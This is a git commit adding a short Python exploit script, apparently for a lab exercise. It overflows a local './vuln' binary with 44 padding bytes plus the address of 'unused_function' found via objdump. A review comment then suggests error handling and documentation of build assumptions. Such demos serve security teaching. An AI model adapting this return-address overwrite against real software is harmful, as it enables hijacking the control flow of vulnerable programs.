| author | Arslaan Pathan <[email protected]> | 2026-05-20 19:46:27 +1200 |
|---|---|---|
| committer | Arslaan Pathan <[email protected]> | 2026-05-20 19:46:27 +1200 |
| commit | cf00559b398eab50dc04a584ff22339258758364 (patch) | |
| tree | c22130b03dfb77f6ebbf807d9bda3cd43a0ba978 /exploit.py | |
Diffstat (limited to 'exploit.py')
| -rwxr-xr-x | exploit.py | 14 |
1 files changed, 14 insertions, 0 deletions
diff --git a/exploit.py b/exploit.py
new file mode 100755
index 0000000..6ec37e5
--- /dev/null
+++ b/exploit.py
@@ -0,0 +1,14 @@
+#!/usr/bin/env python3
+import subprocess
+
+print("locating address of unused_function...")
+objdump_output = subprocess.check_output(['objdump', '-d', './vuln'], text=True)
+for line in objdump_output.split('\n'):
+ if '<unused_function>:' in line:
+ address_hex = line.split()[0]
+ address_bytes = bytes.fromhex(address_hex)[::-1]
+ print(f"found address (little endian): {str(address_bytes)}")
+ break
+
+payload = b'A' * 44 + address_bytes
+subprocess.run(["./vuln", payload]) |
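Review bot: `address_bytes` is only bound inside the `if '<unused_function>:' in line:` branch, so when objdump's output has no such symbol (stripped binary, renamed function) the script dies with a NameError at the `payload = ...` line instead of reporting the cause. Giving the loop an `else:` clause with `raise SystemExit("unused_function not found in ./vuln")` would make that failure explicit. The file also has no module docstring and the constant `44` is unexplained. A short header should state that this is a demonstration against the repository's own `./vuln` test binary, and say what `44` is measured from and which build it was measured on. The approach presumably only holds when the binary is built without a stack protector and at a fixed load address, so the header should name those build assumptions; that tells a reader which mitigations stop the demo.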
